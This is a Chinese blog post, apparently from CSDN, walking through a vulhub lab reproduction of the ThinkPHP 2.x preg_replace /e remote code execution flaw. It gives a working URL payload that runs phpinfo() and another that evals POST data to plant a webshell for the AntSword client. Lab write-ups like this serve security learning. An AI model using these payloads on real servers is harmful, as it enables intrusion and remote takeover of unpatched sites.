thinkphp2.x 远程代码执行漏洞

最新推荐文章于 2024-12-03 13:03:22 发布
最新推荐文章于 2024-12-03 13:03:22 发布
阅读量180 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/windcrazyboy/article/details/132267506
本文介绍了在vulhub靶场中进行漏洞利用的过程。首先说明了vulhub靶场的配置,包括安装docker及docker compose、拉取镜像等。接着分析了thinkphp中preg_replace函数/e参数导致代码执行漏洞的原因,最后介绍了利用该漏洞弹phpinfo界面和用蚁剑链接的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

       小白飘过,跟随大佬脚步的一天[doge],具体实现过程是在靶场(vulhub)中进行的

目标:刷完vulhub靶场( 希望 有生之年)

 ———————————————————————————————————————

先决:vulhub靶场的配置

(1)安装doker以及dokcercompse

这里各位老师的博客很多,不在重复造轮子呃

只说需要注意的几点:

docker compose安装可以用pip安装比较方便。

(2)拉取vulhub的镜像

链接:https://github.com/vulhub/vulhub

不要用!不要用!git 克隆

慢的无法想象,说实在话。直接下载zip包,传进去即可

(3)解压vulhub后进入对应的靶场,并拉取镜像,启动doker

docker-compose up -d

_________________________________________________________________________

重点!!

造成漏洞的原因:

thinkphp中preg_replace(正则式子/e,执行代码,待匹配字符串)中的/e,参数导致代码执行

preg_replace(),导致远程代码执行。有大佬讲过基本原理,就不重复造轮子了(懒了.jpg):深入研究preg_replace \e模式下的代码执行_preg_replace /e_paidx0的博客-CSDN博客

文章内,基本讲了三个问题:

1.造成preg_replace() /e 远程代码 的基本原理

2. 正则匹配的规则

3.{{$phpinfo()}} :此种形式的函数为什么可以被解析(1. 最外层的花括号代表了其内是变量标识 2.内部的花括号与$组合代表了变量形式 )

重点:如果我们想要利用preg_replace函数实现代码执行,我们必须可以控制待匹配字符串的内容变为我们想要执行的代码。具体原理(前面的区域以后再来探索吧!),我们只需要记住由于thinkphp的MVC架构,所以我们请求的url会被preg_replace收入为待匹配字符串处。url则为我们可以控制的字符串

———————————————————————————————————————————

利用:

0.弹phpinfo界面看是否可以利用

http://your ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D

此处可以为?s=/a/b/c/... , uri内只要有{${phpinfo()}}字段即可

蚁剑链接:

/index.php?s=a/b/c/{${print(eval($_POST[1]))}}

这里学到了!preg_repace /e的代码执行,可以用打印eval函数的形式,达到写入临时webshell可以被蚁剑链接。

see2clever
关注
ThinkPHP远程命令执行漏洞
MquaDevops的博客
09-27 266
为了保护应用程序的安全,开发者应该及时更新框架版本、实施输入验证和过滤、使用预处理语句、遵循最小权限原则,并加强开发团队的安全意识。在处理URL中的参数时,ThinkPHP没有对用户输入进行充分的过滤和验证,导致恶意用户可以通过构造特定的URL参数来执行任意的系统命令。将应用程序运行在一个专用的、非特权的用户或用户组下,以减少可能的攻击面。输入验证和过滤:对于从用户获取的输入数据,始终进行充分的验证和过滤。更新到最新版本:确保使用的ThinkPHP框架版本是最新的,开发者通常会及时修复已知的漏洞
Thinkphp V5.X 远程代码执行漏洞 - POC(精:集群5.0*、5.1*、5.2*)
墨痕诉清风的博客
11-07 4678
官方公告:1、2、POC:批量检测单个检测。
thinkphp2-rce远程代码执行漏洞
weixin_45653478的博客
04-27 573
ThinkPHP 2.x版本中,使用的/e模式匹配路由:导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞
【vulhub漏洞复现】Thinkphp 2.x 任意代码执行
RexHa的博客
02-28 2795
当preg_replace使用了/e模式,可以导致代码执行。该函数的正则规则和目标字符可以由用户进行输入。preg_replace 函数在匹配到符号正则的字符串时,会将替换字符(第二个参数)当做代码来执行。在ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由,导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞
ThinkPHP2.2 任意代码执行漏洞 利用
weixin_34024034的博客
07-15 551
2019独角兽企业重金招聘Python工程师标准>>> ...
ThinkPHP漏洞详解(自学)
m0_64481831的博客
03-01 4443
Thinkphp是一个快速、兼容而且简单的轻量级PHP开发框架。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。Thinkphp发展至今,主要有2.x、3.x、5.x、6.x系列,其中2.x和3.x系列官方已停止维护,5.x系列是目前使用最多的一个系列,而3.x系列比较多的老用户。
ThinkPHP v5.x命令执行利用工具(可getshell)
11-19
在这个场景中,"ThinkPHP v5.x命令执行利用工具(可getshell)"指的是一个专门针对ThinkPHP v5.x版本的安全漏洞进行利用的工具,该工具能够使得攻击者通过命令执行漏洞获取服务器的shell访问权限。 命令执行漏洞...
Thinkphp 5.x远程命令执行漏洞
白泽Sec安全实验室
11-07 1738
漏洞描述 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,推荐尽快更新到最新版本。 thinkphp5最出名的就是rce,rce有两个大版本的分别: ThinkPHP 5.0-5.0.24 ThinkPHP 5.1.0-5.1.30 因为漏洞触发点和版本的不同,导致payload分为多种,其中一些payload需要取决于debug选项比如直
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1.x 变量覆盖远程代码执行(RCE)漏洞分析 #### 漏洞概述 ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行(RCE)漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心...
ThinkPHP 2.x任意代码执行漏洞
m0_73605862的博客
12-01 461
2.在php环境下直接输入{${phpinfo}}测试代码片段。尝试利用代码执行漏洞读取服务器web目录下的文件列表。2.写入一句话木马,用antsword连接,连接成功了。3.然后就能看到下面的web目录下面的文件了。复现环境中的代码漏洞
ThinkPHP2--RCE漏洞复现
m0_74402888的博客
05-03 1323
var['\1']="\2" 这里双引号引发函数执行,了解为什么${}会执行,在PHP当中,${}是可以构造一个变量的,{}写的是一般的字符,那么就会被当成变量,比如${a}等价于$a,那如果{}写的是一个已知函数名称呢?()值提取匹配的字符串,有几个括号就代表有几个匹配的字符串,看结果我们就知道,我们的目的是将键和值分别提取出来,所有有两个(),一个匹配键,一个匹配值。$a的执行语句执行了(注意如果要实现该代码需要修改php的版本为5.x的版本)s=a/a/a/${phpinfo()} 其中a随意。
2022-10-11(一、远程命令执行和系统命令执行)
qq_45751902的博客
10-11 2123
返回一个和 fopen() 所返回的相同的文件指针,只不过它是单向的(只能用于读或写),此指针可以用于 fgets(),fgetss() 和 fwrite()。若出错,则返回 false。同exec()函数类似,passthru()函数也是用来执行外部命令的。当所执行的Unix命令输出二进制数据,并且需要直接传送到浏览器的时候,需要用此函数来替代exec()或system()函数。5.array_map(): 函数将用户自定义函数作用到数组中的每个值上,并返回用户自定义函数作用后的带有新值的数组。
thinkphp 2 - rce漏洞复现
2301_76467680的博客
06-28 263
打开页面成功说明存在漏洞。利用eval函数进行绕过。
Thinkphp 2-rce漏洞复现(全过程)
最新发布
2401_87057954的博客
12-03 735
php漏洞复现
Python武器库开发-武器库篇之ThinkPHP 2.x 任意代码执行漏洞(六十三)
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-22 1536
PHP代码审计是指对PHP程序进行安全审计,以发现潜在的安全漏洞和风险。PHP是一种流行的服务器端脚本语言,广泛用于开发网站和Web应用程序。由于其开源性质和易于学习的特点,许多开发人员使用PHP来构建他们的网站和应用。然而,不可否认的是,PHP应用程序也存在着安全风险。由于PHP的灵活性和易用性,开发人员可能会犯一些常见的安全错误,如注入攻击、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)等。PHP代码审计的目的是识别和修复这些安全漏洞,以确保应用程序的安全性。
ThinkPHP2-RCE漏洞复现
qq_51459600的博客
06-08 1322
影响版本:PHP 5.2~5.6/e 修 正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。
ThinkPHP 2.x 任意代码执行漏洞
weixin_60329395的博客
10-10 1787
ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架。ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:depr,paths));导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞
ThinkPHP 5.x 批量获取Shell漏洞POC解析
常见的Web攻击手段包括但不限于跨站脚本攻击(XSS)、跨站请求伪造(CSRF)、SQL注入、文件包含漏洞远程代码执行(RCE)等。 #### 3. 漏洞利用(Exploitation) 漏洞利用是指攻击者利用软件中的安全漏洞进行攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值